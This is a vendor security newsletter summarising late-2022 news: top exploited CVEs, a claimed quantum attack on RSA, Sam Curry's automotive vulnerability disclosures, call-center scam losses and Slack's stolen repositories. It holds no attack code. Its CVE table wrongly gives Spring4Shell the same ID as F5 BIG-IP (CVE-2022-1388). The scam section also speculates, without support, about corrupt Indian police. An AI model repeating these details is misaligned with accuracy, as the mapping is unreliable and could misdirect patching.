Top exploited vulnerabilities of 2022 and more - This Week in Security - Dec 26th to Dec 30th

Happy New Year!

As we start the year, it's a good time to reflect on the state of cybersecurity. Looking back at the past year, it's clear that cyber threats continue to evolve and pose a significant risk to businesses and individuals alike. The top exploited vulnerabilities of 2022, according to CISA, has a total of 8 vulnerabilities including the notorious Log4J (CVE-2021-44228).  F5’s own CVE-2022-1388 made the list at number 5. This is a good reminder that if you have a system impacted by CVE-2022-1388 please remediate this vulnerability as described in https://support.f5.com/csp/article/K23605346.

Top Exploited Vulnerabilities of 2022

 

Vulnerability

Description

Affected Systems

Exploited By

Follina (CVE-2022-30190)

Zero-click remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (ms-msdt)

Microsoft Windows

Chinese APT groups (TA413), APT28 (Russia)

Microsoft Office Bug (CVE-2017-11882)

Memory corruption glitch in Microsoft Office’s Equation Editor enabling remote code execution on vulnerable devices

Microsoft Office

Chinese, North Korean, and Russian hackers

Log4Shell (CVE-2021-44228)

Zero-day vulnerability in Log4j, a popular Java logging framework, involving arbitrary code execution

Java applications

Chinese and Iranian state threat actors, APT10 and DEV-0270

ProxyNotShell (CVE-2022-41082)

Vulnerability in Microsoft Exchange Server 2013, 2016, and 2019 allowing attackers to escalate privileges to run PowerShell and gain arbitrary or remote code execution on compromised servers

Microsoft Exchange Server

Ransomware groups

F5 BIG-IP (CVE-2022-1388)

Unauthenticated attacker with network access can execute arbitrary system commands, create or delete files, or disable services

F5 BIG-IP systems

Multiple state sponsored APTs

Chrome zero-day (CVE-2022-0609)

Fresh uses after free vulnerability allowing remote attacker to potentially exploit heap corruption via a crafted HTML page

Google

 

Spring4Shell (CVE-2022-1388)

critical vulnerability in Spring Framework

Spring Framework

unknown threat actor

Atlassian Confluence (CVE-2022-26134)

OGNL injection that allows unauthenticated attackers to execute arbitrary code

Atlassian Confluence

8220 gang

 

 

 

 

https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF

 

Breaking RSA with a Quantum Computer

Some Chinese researchers have published a paper claiming that they have found a way to break 2048-bit RSA encryption. This is potentially a significant development because RSA encryption is widely used for secure communication. The researchers used a combination of classical lattice reduction techniques and a quantum approximate optimization algorithm, which allowed them to factor numbers using a relatively small quantum computer with only 10 qbits. While the research has not yet been tested on a larger scale, it raises concerns about the security of RSA encryption. The Chinese government has not classified the research, which is notable because it suggests that the government does not view the research as posing a threat to national security.

https://www.schneier.com/blog/archives/2023/01/breaking-rsa-with-a-quantum-computer.html

https://arxiv.org/pdf/2212.12372.pdf

 

Vulnerabilities affecting hundreds of millions of vehicles

Several car brands have fixed vulnerabilities that could have allowed hackers to remotely control various functions of certain cars made after 2012. A security researcher at Yuga Labs discovered the vulnerabilities while researching the mobile apps for several car brands that allow customers to remotely start, stop, lock, and unlock their vehicles. The researcher and other researchers initially studied Hyundai and Genesis cars and found that the verification process for gaining access to a vehicle relied on registered email addresses, which they were able to bypass to gain full control.

Top 5:

 

Company

Details

Impact

AT&T

Full compromise of an undisclosed system used by AT&T which would've allowed an attacker to send and receive text messages, retrieve live geolocation, and disable hundreds of millions of SIM cards which were installed in the following vehicles: Tesla, Subaru, Toyota, Lexus, Ford, Fiat Chrysler Automobiles, Land Rover, Mazda, Volvo, Honda, BMW, Cruise

Affected hundreds of millions of SIM cards managed by tens of thousands of companies. The impact of this vulnerability went far beyond the scope of car hacking and affected nearly every industry (nearly anything which uses a SIM card)

Spireon

Multiple vulnerabilities, including: Full administrator access to a company-wide administration panel with ability to send arbitrary commands to an estimated 15.5 million vehicles (unlock, start engine, disable starter, etc.), read any device location, and flash/update device firmware. Remote code execution on core systems for managing user accounts, devices, and fleets. Ability to access and manage all data across all of Spireon. Ability to fully takeover any fleet (this would’ve allowed tracking & shutting off starters for police, ambulances, and law enforcement vehicles for a number of different large cities and dispatch commands to those vehicles, e.g. “navigate to this location”). Full administrative access to all Spireon products, including GoldStar, LoJack, FleetLocate, NSpire, and Trailer & Asset. In total, there were 15.5 million devices (mostly vehicles) and 1.2 million user accounts (end user accounts, fleet managers, etc.)

Affected 15.5 million devices, mostly vehicles, and 1.2 million user accounts. The impact of this vulnerability went beyond just vehicles and also affected products and user accounts.

Mercedes-Benz

Access to hundreds of mission-critical internal applications via improperly configured SSO, including multiple Github instances, internal chat tool, SonarQube, Jenkins, internal cloud deployment services, and internal vehicle-related APIs. Remote code execution on multiple systems. Memory leaks leading to employee/customer PII disclosure and account access.

Impacted internal systems and applications, potentially leading to the disclosure of employee and customer personal information and access to various internal accounts.

BMW, Rolls Royce

Company-wide core SSO vulnerabilities which allowed access to any employee application as any employee, including access to internal dealer portals and applications used by remote workers and dealerships.

Impacted internal systems and applications, potentially leading to access to various internal accounts and dealer information.

Ferrari

Full zero-interaction account takeover for any Ferrari customer account

Impacted internal systems and applications, potentially leading to access to various internal accounts and dealer information.

 

You can read the complete list on the blog post by Sam Curry. There is a great in-depth coverage of each category of vulnerability.

https://samcurry.net/web-hackers-vs-the-auto-industry/

https://twitter.com/samwcyo/status/1610216145142878212

High cost of call center scams

Romance-related scams carried out by Indian phishing gangs, have caused losses of more than $3 billion to US citizens in the last two years alone. Total money lost in all internet/call centre-related frauds in the last 11 months has been estimated at $10.2 billion, an increase of 47% against last year’s $6.9 billion. Most of the victims of these frauds are elderly above the age of 60 years.

The FBI has deputed a permanent representative at the US embassy in New Delhi to work with the CBI, Interpol, and Delhi Police to bust these gangs and freeze money transferred through wire and crypto currencies to syndicates operating from India. The FBI is ready to supplement the investigative gaps by providing evidence to local law enforcement agencies in prosecuting criminals involved.

The scams affecting Americans are also impacting the elderly population in India. The authorities in India have been slow to react to these issues, possibly because the police do not fully understand the impact of these scams or because they are corrupt and involved in the mafia that runs them. This issue is depicted in the Netflix series "Jamtara," which shows how these scams are connected to the political system and driven by the desire for money and anti-American sentiment.

https://timesofindia.indiatimes.com/india/illegal-desi-call-centres-behind-10-billion-loss-to-americans-in-2022/articleshow/96501320.cms

https://en.wikipedia.org/wiki/Jamtara_%E2%80%93_Sabka_Number_Ayega

Private code repositories of Slack stolen from GitHub

Slack suffered a security incident over the holidays affecting some of its private GitHub code repositories.

According to the details published on their blog:

"On December 29, 2022, we were notified of suspicious activity on our GitHub account. Upon investigation, we discovered that a limited number of Slack employee tokens were stolen and misused to gain access to our externally hosted GitHub repository. Our investigation also revealed that the threat actor downloaded private code repositories on December 27. No downloaded repositories contained customer data, means to access customer data, or Slack’s primary codebase."

Source code is stolen to explore vulnerabilities and develop zero-day exploits. From security perspective, this is simply about the cost to penetrate security versus the benefit to the attacker. Access to private code is where the benefit to the attacker goes up faster than the company can afford to cover, and the company must cover all the attack surfaces.

https://slack.com/blog/news/slack-security-update

 

Updated Jan 07, 2023
Version 2.0